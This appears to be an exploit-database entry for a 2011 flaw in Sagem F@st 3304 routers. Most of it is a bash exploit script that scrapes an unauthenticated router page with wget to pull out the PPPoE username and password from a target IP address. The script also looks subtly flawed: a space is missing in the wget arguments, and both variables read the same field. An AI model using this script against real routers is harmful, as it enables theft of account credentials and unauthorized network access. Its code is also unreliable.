Sagem F@st 3304 Routers – PPPoE Credentials Information Disclosure

  • 作者: securititracker
    日期: 2011-07-27
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/35997/
  • source: https://www.securityfocus.com/bid/48908/info
    
    Sagem F@st 3304 router is prone to a remote information-disclosure vulnerability because it fails to restrict access to sensitive information.
    
    A remote attacker exploit this issue to obtain sensitive information, possibly aiding in further attacks. 
    
    #!/bin/bash
    #########################################
    # Exploit Title: Sagem 3304 Routers Get PPPOE Password
    # Date 27/07/2011
    # Author: securititracker@gmail.com
    # Software Link: null
    # Version: Sagem Routers F@st 3304
    # Tested on: Sagem F@ST 3304
    #
    #########################################
    
    
    Usage()
    {
    echo "Usage : $0 IP_ADDRESS"
    }
    if [ "$1" != "" ]
    then
    IP_ADDRESS="$1"
    else
    Usage
    exit 1
    fi
    
    USER_NAME=`wget http://$IP_ADDRESS/quickconfname_ADSL.html-t 1 -q -O -| grep "msg051" | tr " " "\n"| grep value | tr -d \\ |tr -d "\"" | awk -F= '{print($2)}' `
    
    USER_PASSWORD=`wget http://$IP_ADDRESS/quickconfname_ADSL.html-t 1 -q -O -| grep "msg051" | tr " " "\n"| grep value | tr -d \\ |tr -d "\"" | awk -F= '{print($2)}' `
    
    echo "Username = $USER_NAME; Passsword = $USER_PASSWORD"